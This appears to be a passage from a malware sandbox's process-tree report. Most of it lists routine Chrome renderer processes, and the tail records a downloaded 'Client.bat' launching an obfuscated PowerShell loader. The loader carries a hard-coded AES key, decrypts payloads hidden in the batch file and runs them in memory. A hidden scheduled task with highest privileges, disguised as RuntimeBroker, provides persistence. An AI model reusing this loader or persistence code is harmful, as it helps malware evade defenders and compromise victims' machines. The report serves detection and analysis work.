    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=5420,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5404 /prefetch:1
    3⤵
    PID:1920
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=3176,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3244 /prefetch:1
    3⤵
    PID:2988
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=5228,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5216 /prefetch:1
    3⤵
    PID:3384
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=4732,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=4348 /prefetch:1
    3⤵
    PID:2360
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=4604,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5544 /prefetch:1
    3⤵
    PID:1352
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=6052,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=6064 /prefetch:1
    3⤵
    PID:4596
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=6228,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=6100 /prefetch:1
    3⤵
    PID:816
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6424,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=6368 /prefetch:8
    3⤵
    PID:2776
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=3160,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=6388 /prefetch:1
    3⤵
    PID:3820
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=6456,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=6480 /prefetch:1
    3⤵
    PID:3064
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=6740,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=6772 /prefetch:1
    3⤵
    PID:4428
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --field-trial-handle=6908,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=6888 /prefetch:1
    3⤵
    PID:4736
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --field-trial-handle=6892,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=7052 /prefetch:1
    3⤵
    PID:4460
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=7036,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=7200 /prefetch:1
    3⤵
    PID:4764
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --field-trial-handle=6900,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=7344 /prefetch:1
    3⤵
    PID:4212
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --field-trial-handle=7368,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=7488 /prefetch:1
    3⤵
    PID:2928
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --field-trial-handle=7472,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=7632 /prefetch:1
    3⤵
    PID:2948
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --field-trial-handle=7616,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=7776 /prefetch:1
    3⤵
    PID:3416
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --field-trial-handle=7760,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=7920 /prefetch:1
    3⤵
    PID:632
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --field-trial-handle=7904,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=8064 /prefetch:1
    3⤵
    PID:4656
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --field-trial-handle=8048,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=8212 /prefetch:1
    3⤵
    PID:912
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --field-trial-handle=8196,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=8356 /prefetch:1
    3⤵
    PID:4388
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --field-trial-handle=7464,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=8492 /prefetch:1
    3⤵
    PID:3964
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --field-trial-handle=8524,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=8664 /prefetch:1
    3⤵
    PID:2284
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --field-trial-handle=8692,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=8804 /prefetch:1
    3⤵
    PID:4172
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --field-trial-handle=7320,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=9072 /prefetch:1
    3⤵
    PID:3268
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7804,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=7180 /prefetch:8
    3⤵
    - NTFS ADS
    PID:2672
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --field-trial-handle=8184,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=6412 /prefetch:1
    3⤵
    PID:4300
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --field-trial-handle=9520,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=9524 /prefetch:1
    3⤵
    PID:5172
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --field-trial-handle=9416,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=9336 /prefetch:1
    3⤵
    PID:5372
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --field-trial-handle=9596,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=9588 /prefetch:1
    3⤵
    PID:5504
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --field-trial-handle=9468,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=9444 /prefetch:1
    3⤵
    PID:5572
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --field-trial-handle=9616,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=9880 /prefetch:1
    3⤵
    PID:5644
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --field-trial-handle=9724,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=10000 /prefetch:1
    3⤵
    PID:5652
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --field-trial-handle=10036,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=8948 /prefetch:1
    3⤵
    PID:5660
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --field-trial-handle=9376,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=10284 /prefetch:1
    3⤵
    PID:5668
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --field-trial-handle=10304,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=10160 /prefetch:1
    3⤵
    PID:5676
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --field-trial-handle=10320,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=10580 /prefetch:1
    3⤵
    PID:5684
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --field-trial-handle=10820,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=10836 /prefetch:1
    3⤵
    PID:5228
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --field-trial-handle=11136,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=11160 /prefetch:1
    3⤵
    PID:5560
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --field-trial-handle=11144,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=11180 /prefetch:1
    3⤵
    PID:5460
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --field-trial-handle=10864,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=10764 /prefetch:1
    3⤵
    PID:6060
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --field-trial-handle=11328,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=11352 /prefetch:1
    3⤵
    PID:6100
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --field-trial-handle=11508,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=11524 /prefetch:1
    3⤵
    PID:5456
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --field-trial-handle=11476,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=11644 /prefetch:1
    3⤵
    PID:5480
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --field-trial-handle=11788,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=11368 /prefetch:1
    3⤵
    PID:6188
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --field-trial-handle=11780,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=11912 /prefetch:1
    3⤵
    PID:6196
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --field-trial-handle=12080,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=12104 /prefetch:1
    3⤵
    PID:6296
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --field-trial-handle=12244,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=12052 /prefetch:1
    3⤵
    PID:6400
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --field-trial-handle=12612,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=12520 /prefetch:1
    3⤵
    PID:6668
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --field-trial-handle=12564,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=12528 /prefetch:1
    3⤵
    PID:6720
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --field-trial-handle=6428,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=12584 /prefetch:1
    3⤵
    PID:6728
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --field-trial-handle=6432,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=12500 /prefetch:1
    3⤵
    PID:6752
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --field-trial-handle=12640,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=12920 /prefetch:1
    3⤵
    PID:6760
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --field-trial-handle=12544,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=12772 /prefetch:1
    3⤵
    PID:6944
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --field-trial-handle=10040,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=11596 /prefetch:1
    3⤵
    PID:6928
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --field-trial-handle=4688,i,3054590177163552263,135952232386611073,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=9240 /prefetch:1
    3⤵
    PID:5924
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\Client.bat"
  2⤵
  PID:4212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QkUW/Ic/Ytw2MngLixiwh7Ve+bqYu8nUO5hDHRQz4ig='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RlZ2esi6BcZ9nBYBMPpf/Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $mbADb=New-Object System.IO.MemoryStream(,$param_var); $eVlmz=New-Object System.IO.MemoryStream; $aYOFC=New-Object System.IO.Compression.GZipStream($mbADb, [IO.Compression.CompressionMode]::Decompress); $aYOFC.CopyTo($eVlmz); $aYOFC.Dispose(); $mbADb.Dispose(); $eVlmz.Dispose(); $eVlmz.ToArray();}function execute_function($param_var,$param2_var){ $moLPn=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $jIgXR=$moLPn.EntryPoint; $jIgXR.Invoke($null, $param2_var);}$SydOg = 'C:\Users\Admin\Downloads\Client.bat';$host.UI.RawUI.WindowTitle = $SydOg;$ixfQm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($SydOg).Split([Environment]::NewLine);foreach ($dBaqK in $ixfQm) { if ($dBaqK.StartsWith('ffMbuqHSEVphvzpRoaZs')) { $eNuZY=$dBaqK.Substring(20); break; }}$payloads_var=[string[]]$eNuZY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:4220
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    3⤵
    - Modifies registry class
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    PID:404
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_412_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_412.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:6916
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_412.vbs"
      4⤵
      PID:6992
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_412.bat" "
        5⤵
        
        PID:5352
      - C:\Windows\system32\cmd.exe
        
